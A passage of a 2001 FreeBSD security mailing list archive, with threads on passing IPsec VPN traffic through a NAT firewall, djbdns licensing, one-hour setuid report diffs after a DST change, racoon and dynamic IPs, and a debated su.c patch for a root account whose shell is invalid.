http://www.cs.ndsu.nodak.edu/~davlarso/ipf/ > > Dave (the author of this patch) apparently has written an IPSec proxy module > for ipfilter. Is there any way to incorporate this code into ipfw, which (if > my understanding is correct, a small but real possibility ;-) is based on > ipfilter source? If so, would this be the forum to put this request to? I am > tempted to try to hack this in myself, but I don't understand how (if?) the > ipfilter code relates to the ipfw code in the source tree. This is really not a ipfw(8) issue, but rather a natd(8) one. Having said that, if you are just going to do ESP and we're doing standard IPsec, you need to poke a hole in the firewall for the ESP protocol (50) and IKE (500/udp) communications. natd(8) will handle the keying over UDP fine (since NAT of UDP and TCP are classics). As for ESP, last I knew, natd(8) will handle a single ESP association just fine. I've never used the Nortel client, but I've tested a Cisco IPsec client from behind a NAT'ing FreeBSD firewall without problems (using both naked ESP and UDP encapsulated (bleh!) ESP). The most likely place for problems will be in the key exchange and it might take deep voodoo to get that to go. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 11:44:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from tholian.securitydynamics.com (mail.rsasecurity.com [204.167.112.129]) by hub.freebsd.org (Postfix) with SMTP id 8D80A37B71A for ; Mon, 2 Apr 2001 11:44:25 -0700 (PDT) (envelope-from dfinkelstein@rsasecurity.com) Received: from sdtihq24.securid.com by tholian.securitydynamics.com via smtpd (for hub.freebsd.org [216.136.204.18]) with SMTP; 2 Apr 2001 18:42:01 UT Received: from tuna.rsa.com (tuna.rsa.com [10.80.211.153]) by sdtihq24.securid.com (Pro-8.9.3/Pro-8.9.3) with ESMTP id OAA14050; Mon, 2 Apr 2001 14:44:19 -0400 (EDT) Received: from rsasecurity.com ([10.81.217.239]) by tuna.rsa.com (8.8.8+Sun/8.8.8) with ESMTP id LAA20342; Mon, 2 Apr 2001 11:44:26 -0700 (PDT) From: dfinkelstein@rsasecurity.com Message-Id: <200104021844.LAA20342@tuna.rsa.com> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: "Ian Cartwright" Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSec VPN Client behind Firewall In-reply-to: Your message of "Sun, 01 Apr 2001 13:25:39 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 02 Apr 2001 11:44:17 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Ian Cartwright" wrote: >I have been trying to install the Nortel Contivity Extranet Client on a >Windows 2000 box behind my FreeBSD firewall. The firewall is FreeBSD-STABLE >(as of about amonth ago) with ipfw and nat running. After, scanning as many >newsgroups, mailing lists and web pages as I could find on the subject, I >have still not found a way to do this... I have seen a couple discussion in >this newsgroup and a (hopefully) promising patch to ipfilter that may help >me (and whoever else is out there with my problem)... I saw a message somewhere (I thought it was here) about somebody who accomplished this by simply setting up a firewall rule to allow full access to/from the other end of his VPN pipe. I have tested this with my Nortel client (running on an NT laptop); I just added rules to ipfw to allow traffic to and from my VPN connection. Seems to work great, though you are open to attacks due to IP spoofing. --- David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 12:16:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 060B137B722 for ; Mon, 2 Apr 2001 12:16:07 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 14314 invoked by uid 0); 2 Apr 2001 19:16:03 -0000 Received: from pd950880b.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.11) by mail.gmx.net (mp002-rz3) with SMTP; 2 Apr 2001 19:16:03 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA03551 for freebsd-security@freebsd.org; Mon, 2 Apr 2001 19:04:27 +0200 Date: Mon, 2 Apr 2001 19:04:27 +0200 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: Something's happening with named Message-ID: <20010402190426.H20830@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <4630.010329@rostokgroup.com> <5.0.0.25.0.20010329195331.06d46eb0@mail.Go2France.com> <20010402025846.C75063@mail.webmonster.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20010402025846.C75063@mail.webmonster.de>; from karsten@rohrbach.de on Mon, Apr 02, 2001 at 02:58:46AM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 02, 2001 at 02:58 +0200, Karsten W. Rohrbach wrote: > > couldn't bind just go away in future freebsd releases? > im running tinydns since quite some time and i am pretty happy > with it. happier than with bind ;-) While those who know both program suites will agree on the advantages of djbdns (quality and fitness in all the vanilla setups, only bigger setups need(?) special BIND features), there's not only the technological side in this topic. It's *very* easy to do something wrong and collide with DJB's licensing scheme. There have been multiple discussions about this very topic, the latest was within the past two months. Unless there's a definitive statement about the legalese DJBware won't get packaged and shipped with a distro. Maybe you want to bug DJB for an ACK? (hint, hint) While I understand his reasoning ("Any deviation from my design is a bug and voids my warranty") I see the concerns of distributors, too ("Will he sue me for installing it into a different location? Will he sue me for extending it while still calling it djbdns? May I even binary package and ship it?"). Sorry, I lack English words. But in German "heikel" ("troublesome"?) would be most appropriate. I'm sure the other replies will tend to some "highly dangerous from the non technical POV", too. :( We all should be glad that it's so easy to not run bind and install djbdns from the ports instead. This makes it a consious(sp?) decision by the admin. It's very much like running an MTA different from sendmail or running non main stream software at all: You're free to do it but you have to take care yourself ... virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 21: 0:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from calliope.cs.brandeis.edu (calliope.cs.brandeis.edu [129.64.3.189]) by hub.freebsd.org (Postfix) with ESMTP id 1A52F37B71B for ; Mon, 2 Apr 2001 21:00:21 -0700 (PDT) (envelope-from meshko@calliope.cs.brandeis.edu) Received: from localhost (meshko@localhost) by calliope.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id AAA02878 for ; Tue, 3 Apr 2001 00:00:18 -0400 Date: Tue, 3 Apr 2001 00:00:18 -0400 (EDT) From: Mikhail Kruk To: Subject: odd setuid diffs Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I got very strange (IMHO) setuid diffs in my security reports today... Any explanations appreciated: xxxx.xxxx.xxx setuid diffs: 69c69 < 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 16:20:56 2000 /usr/local/bin/screen-3.9.5 --- > 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 17:20:56 2000 /usr/local/bin/screen-3.9.5 71c71 < 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 22:19:08 1999 /usr/local/sbin/hfaxd --- > 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 23:19:08 1999 /usr/local/sbin/hfaxd They are off by one hour, all right. I see possible cause: yesterday I've noticed that my time was set to EST instead of EDT and changed my timezone (one hour difference). But the question is: why those two files, not the rest of them?? What do they have in common? (Running 4.3-BETA FreeBSD 4.3-BETA #11: Fri Mar 9 03:36:40 EST 2001) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 21:11:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 7139D37B71E for ; Mon, 2 Apr 2001 21:11:10 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1928 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Apr 2001 23:08:30 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Apr 2001 23:08:29 -0500 (CDT) From: James Wyatt To: Mikhail Kruk Cc: security@freebsd.org Subject: Re: odd setuid diffs In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org They were all across the DST change barrier last year and the year before. We are just past the DST barrier this year. - Jy@ On Tue, 3 Apr 2001, Mikhail Kruk wrote: > Date: Tue, 3 Apr 2001 00:00:18 -0400 (EDT) > From: Mikhail Kruk > To: security@freebsd.org > Subject: odd setuid diffs > > I got very strange (IMHO) setuid diffs in my security reports today... Any > explanations appreciated: > > xxxx.xxxx.xxx setuid diffs: > 69c69 > < 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 16:20:56 2000 > /usr/local/bin/screen-3.9.5 > --- > > 1698870 -rwsr-xr-x 1 root wheel 219148 Jul 19 17:20:56 2000 > /usr/local/bin/screen-3.9.5 > 71c71 > < 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 22:19:08 1999 > /usr/local/sbin/hfaxd > --- > > 1230184 -rwsr-xr-x 1 root bin 264148 Jun 3 23:19:08 1999 > /usr/local/sbin/hfaxd > > They are off by one hour, all right. I see possible cause: yesterday I've > noticed that my time was set to EST instead of EDT and changed my > timezone (one hour difference). But the question is: why those two files, > not the rest of them?? What do they have in common? > > (Running 4.3-BETA FreeBSD 4.3-BETA #11: Fri Mar 9 03:36:40 EST 2001) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 7:25:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from bootp-20-219.bootp.virginia.edu (bootp-20-219.bootp.Virginia.EDU [128.143.20.219]) by hub.freebsd.org (Postfix) with ESMTP id 0136137B719 for ; Tue, 3 Apr 2001 07:25:28 -0700 (PDT) (envelope-from mipam@virginia.edu) Received: by bootp-20-219.bootp.virginia.edu (Postfix) id 0DC781D001; Tue, 3 Apr 2001 09:27:28 -0500 (EST) Date: Tue, 3 Apr 2001 09:27:27 -0500 From: Mipam To: Erik Salander Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSec and dynamic IP? Message-ID: <20010403092727.A15044@bootp-20-219.bootp.virginia.edu> Reply-To: mipam@ibb.net References: <3AC8AABF.C2B52283@whistle.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AC8AABF.C2B52283@whistle.com>; from erik@whistle.com on Mon, Apr 02, 2001 at 09:37:19AM -0700 X-Operating-System: BSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 02, 2001 at 09:37:19AM -0700, Erik Salander wrote: > > Is there a way to setup setkey and racoon.conf to accomodate dynamic > IP on the security gateway of a LAN-to-LAN VPN? I have a reply from > Soichi below, indicating this isn't part of the KAME distribution, > perhaps a patch someplace? Racoon wont support dynamic ip's. However, i believe isakmpd from openbsd does. You could try to use that for example, i use it under netbsd, dont use it with dynamic ip, but i heared that some guys who use openbsd with isakmpd have it running with dynamic ip's :) Bye, Mipam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 7:28:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from bootp-20-219.bootp.virginia.edu (bootp-20-219.bootp.Virginia.EDU [128.143.20.219]) by hub.freebsd.org (Postfix) with ESMTP id 04C1A37B720 for ; Tue, 3 Apr 2001 07:28:47 -0700 (PDT) (envelope-from mipam@virginia.edu) Received: by bootp-20-219.bootp.virginia.edu (Postfix) id 6470E1D001; Tue, 3 Apr 2001 09:30:47 -0500 (EST) Date: Tue, 3 Apr 2001 09:30:47 -0500 From: Mipam To: Erik Salander Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSec and dynamic IP? Message-ID: <20010403093047.B15044@bootp-20-219.bootp.virginia.edu> Reply-To: mipam@ibb.net References: <3AC8AABF.C2B52283@whistle.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AC8AABF.C2B52283@whistle.com>; from erik@whistle.com on Mon, Apr 02, 2001 at 09:37:19AM -0700 X-Operating-System: BSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eeeeh, small correction. Racoon does not support dynamic ip's now that is. I dont know if it will in the future, so my statement "it wont" could be very wrong, sorry. Mipam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 10:20:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 49B4F37B71C for ; Tue, 3 Apr 2001 10:20:16 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA12944; Tue, 3 Apr 2001 10:20:00 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda12938; Tue Apr 3 10:19:53 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f33HJm142973; Tue, 3 Apr 2001 10:19:48 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdl42296; Tue Apr 3 10:18:48 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f33HIjp30161; Tue, 3 Apr 2001 10:18:45 -0700 (PDT) Message-Id: <200104031718.f33HIjp30161@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdq28808; Tue Apr 3 10:18:08 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: mipam@ibb.net Cc: Erik Salander , freebsd-security@FreeBSD.ORG Subject: Re: IPSec and dynamic IP? In-reply-to: Your message of "Tue, 03 Apr 2001 09:30:47 CDT." <20010403093047.B15044@bootp-20-219.bootp.virginia.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Apr 2001 10:18:07 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010403093047.B15044@bootp-20-219.bootp.virginia.edu>, Mipam write s: > Eeeeh, small correction. > Racoon does not support dynamic ip's now that is. > I dont know if it will in the future, so my statement > "it wont" could be very wrong, sorry. I use pipsecd between home (@home) and work. Pipsecd does not support IKE though it does support dynamic IP's. It also has the advantage of allowing me to filter (IPF or IPFW) based on the encapsulating packet via xl0 and the encapsulated packet via tun0. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 10:31:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from jubilee.sd.odu.edu (sd11-061.sd.odu.edu [128.82.11.61]) by hub.freebsd.org (Postfix) with ESMTP id C66EF37B71D; Tue, 3 Apr 2001 10:31:23 -0700 (PDT) (envelope-from dknj@dknj.org) Received: from majorzoot (darkkiwi [192.168.2.2]) by jubilee.sd.odu.edu (Postfix) with SMTP id EEE98324E; Tue, 3 Apr 2001 12:33:26 -0400 (EDT) Message-ID: <005401c0bc63$7cb36650$0202a8c0@majorzoot> From: "Kherry Zamore" To: Cc: Subject: su change? Date: Tue, 3 Apr 2001 13:28:23 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just recently my friend locked himself out of his machine by changing root's shell to a nonexisting file. The only way he could become root again was by rebooting the machine into single user mode and changing it from there. Now while I know that its foolish to change root's shell in the first place, i don't think this is an acceptable punishment for those that do. According to su.c, if the user you are changing to does not have a valid shell, su complains and exits. A valid thing to do in today's security conscience society. Now, lets say you want to become root to fix this invalid shell problem.. su's nature is to complain and exit. The fix is rather simple, somewhere around line 310 in su.c is: if (!chshell(pwd->pw_shell) && ruid) errx(1, "permission denied (shell)."); The only thing we need to prepend to this is a check to see if we are trying to su to root, which we should allow regardless of the shell specified: if (pwd->pw_uid) if (!chshell(pwd->pw_shell) && ruid) errx(1, "permission denied (shell)."); Patches are available here (tested on 4.1): http://www.dknj.org/sourcecode/patches/su/ -= Kherry Zamore -=- (757) 683-7386 =- -= Resident Computer & Network Geek/God =- -= http://www.dknj.org =- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 10:43:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from bellona.host4u.net (bellona.host4u.net [216.71.64.52]) by hub.freebsd.org (Postfix) with ESMTP id 2F84837B71A for ; Tue, 3 Apr 2001 10:43:31 -0700 (PDT) (envelope-from ben@eproduct.org) Received: from eproduct.org (calder.textcrime.com [206.97.79.187]) by bellona.host4u.net (8.8.5/8.8.5) with ESMTP id MAA06461; Tue, 3 Apr 2001 12:36:26 -0500 Message-ID: <3ACA0CA4.AA766BAA@eproduct.org> Date: Tue, 03 Apr 2001 12:47:16 -0500 From: ben hubbard X-Mailer: Mozilla 4.7 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kherry Zamore , freebsd-security@FreeBSD.ORG Subject: Re: su change? References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Idiot that I am, I did the exact same thing on a new box last week - and was less than pleased with my self, and with su's resulting behavior. so, thanks - me thinks this is good. Ben Kherry Zamore wrote: > Just recently my friend locked himself out of his machine by changing root's > shell to a nonexisting file. The only way he could become root again was by > rebooting the machine into single user mode and changing it from there. Now > while I know that its foolish to change root's shell in the first place, i > don't think this is an acceptable punishment for those that do. > > According to su.c, if the user you are changing to does not have a valid > shell, su complains and exits. A valid thing to do in today's security > conscience society. Now, lets say you want to become root to fix this > invalid shell problem.. su's nature is to complain and exit. The fix is > rather simple, somewhere around line 310 in su.c is: > > if (!chshell(pwd->pw_shell) && ruid) > errx(1, "permission denied (shell)."); > > The only thing we need to prepend to this is a check to see if we are trying > to su to root, which we should allow regardless of the shell specified: > > if (pwd->pw_uid) > if (!chshell(pwd->pw_shell) && ruid) > errx(1, "permission denied (shell)."); > > Patches are available here (tested on 4.1): > http://www.dknj.org/sourcecode/patches/su/ > > -= Kherry Zamore -=- (757) 683-7386 =- > -= Resident Computer & Network Geek/God =- > -= http://www.dknj.org =- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11: 3:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from xena.gsicomp.on.ca (cr677933-a.ktchnr1.on.wave.home.com [24.43.230.149]) by hub.freebsd.org (Postfix) with ESMTP id 073FF37B71C; Tue, 3 Apr 2001 11:03:19 -0700 (PDT) (envelope-from matt@gsicomp.on.ca) Received: from hermes (hermes.gsicomp.on.ca [192.168.0.18]) by xena.gsicomp.on.ca (8.11.1/8.11.3) with SMTP id f33I1SR03545; Tue, 3 Apr 2001 14:01:29 -0400 (EDT) (envelope-from matt@gsicomp.on.ca) Message-ID: <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> From: "Matthew Emmerton" To: "Kherry Zamore" , Cc: References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> Subject: Re: su change? Date: Tue, 3 Apr 2001 14:03:36 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > According to su.c, if the user you are changing to does not have a valid > shell, su complains and exits. A valid thing to do in today's security > conscience society. Now, lets say you want to become root to fix this > invalid shell problem.. su's nature is to complain and exit. The fix is > rather simple, somewhere around line 310 in su.c is: > > if (!chshell(pwd->pw_shell) && ruid) > errx(1, "permission denied (shell)."); > > The only thing we need to prepend to this is a check to see if we are trying > to su to root, which we should allow regardless of the shell specified: I disagree. The root account is an account that needs to have the highest number of security checks present. If you're swift enough to change root's shell to something non-standard and forget to update /etc/shells, then having to drop to single user mode is suitable punishment. After all, playing with the root user is like playing with fire -- sooner or later you're going to get burned. Just consider your friend lucky - doing similar things to the root account on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete reinstall - especially if it's running C2-level security. -- Matt Emmerton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11: 9:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by hub.freebsd.org (Postfix) with ESMTP id 0CC4F37B71E; Tue, 3 Apr 2001 11:09:39 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 14kVFI-0002s0-00 ; Tue, 03 Apr 2001 14:09:36 -0400 Date: Tue, 3 Apr 2001 14:09:35 -0400 From: Peter Radcliffe To: freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: su change? Message-ID: <20010403140935.F9618@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca>; from matt@gsicomp.on.ca on Tue, Apr 03, 2001 at 02:03:36PM -0400 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Emmerton probably said: > Just consider your friend lucky - doing similar things to the root account > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete > reinstall - especially if it's running C2-level security. False. Solaris, certainly, would just require booting from cdrom, mounting / and editing the password file. P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:15:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 5E6F637B719; Tue, 3 Apr 2001 11:15:14 -0700 (PDT) (envelope-from craig@allmaui.com) Received: from allmaui.com (pwnat-2-o.placeware.com [209.1.15.34]) by allmaui.com (8.8.8/8.8.5) with ESMTP id OAA11008; Tue, 3 Apr 2001 14:15:11 -0400 Message-ID: <3ACA12BD.A8706D97@allmaui.com> Date: Tue, 03 Apr 2001 11:13:17 -0700 From: Craig Cowen X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Cc: freebsd-stable@FreeBSD.ORG Subject: Re: su change? References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I worked at an isp and the office staff was responsible for terminating accounts. Well, one particular staff member kept screwing up in vi and wiping out the root user's entry. That's when I made them use chsh I believe that it will give error messages like visudo to common mistakes. Peter Radcliffe wrote: > Matthew Emmerton probably said: > > Just consider your friend lucky - doing similar things to the root account > > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete > > reinstall - especially if it's running C2-level security. > > False. > > Solaris, certainly, would just require booting from cdrom, mounting / > and editing the password file. > > P. > > -- > pir pir@pir.net pir@net.tufts.edu > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:16:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id E96A037B718; Tue, 3 Apr 2001 11:16:18 -0700 (PDT) (envelope-from craig@allmaui.com) Received: from allmaui.com (pwnat-2-o.placeware.com [209.1.15.34]) by allmaui.com (8.8.8/8.8.5) with ESMTP id OAA11992; Tue, 3 Apr 2001 14:16:16 -0400 Message-ID: <3ACA12FF.F4000B95@allmaui.com> Date: Tue, 03 Apr 2001 11:14:23 -0700 From: Craig Cowen X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Cc: freebsd-stable@FreeBSD.ORG Subject: Re: su change? References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FALSE! If you have the boot prom set not to allow booting from cdrom, you're bummin' Peter Radcliffe wrote: > Matthew Emmerton probably said: > > Just consider your friend lucky - doing similar things to the root account > > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete > > reinstall - especially if it's running C2-level security. > > False. > > Solaris, certainly, would just require booting from cdrom, mounting / > and editing the password file. > > P. > > -- > pir pir@pir.net pir@net.tufts.edu > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:22:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id BEE5637B727; Tue, 3 Apr 2001 11:22:11 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: by bluenugget.net (Postfix, from userid 65534) id A140D1360A; Tue, 3 Apr 2001 11:23:12 -0700 (PDT) To: Kherry Zamore Subject: Re: su change? Message-ID: <986322192.3aca151091d2a@bluenugget.net> Date: Tue, 03 Apr 2001 11:23:12 -0700 (PDT) From: geniusj@bluenugget.net Cc: freebsd-stable@freebsd.org, freebsd-security@freebsd.org References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> In-Reply-To: <005401c0bc63$7cb36650$0202a8c0@majorzoot> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoting Kherry Zamore : > Just recently my friend locked himself out of his machine by changing > root's > shell to a nonexisting file. The only way he could become root again > was by > rebooting the machine into single user mode and changing it from there. > Now > while I know that its foolish to change root's shell in the first place, > i > don't think this is an acceptable punishment for those that do. > I disagree, anything we can do in su to prevent root access when possibly not wanted is great with me. Besides, if your friend had perhaps used chfn instead of vipw to change his root shell, it *should* have bitched at him if the shell did not exist (i'll have to double check this.) But there are an infinite # of conditionals that we could use in your friend's scenario. Perhaps it would be a better idea if vipw would give a warning if you set the root's shell incorrectly? Cheers, -JD- P.S. DKNJ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:23:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id 6B0CB37B71A; Tue, 3 Apr 2001 11:23:16 -0700 (PDT) (envelope-from christopher@schulte.org) Received: from schulte-laptop.schulte.org ([64.183.199.40]) by poontang.schulte.org (8.12.0.Beta5/8.12.0.Beta5) with ESMTP id 